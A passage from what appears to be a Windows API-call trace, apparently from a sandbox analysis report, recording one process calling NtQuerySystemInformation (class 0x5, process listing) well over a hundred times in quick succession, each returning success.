SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe7a0) returned 0x0 [0221.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: 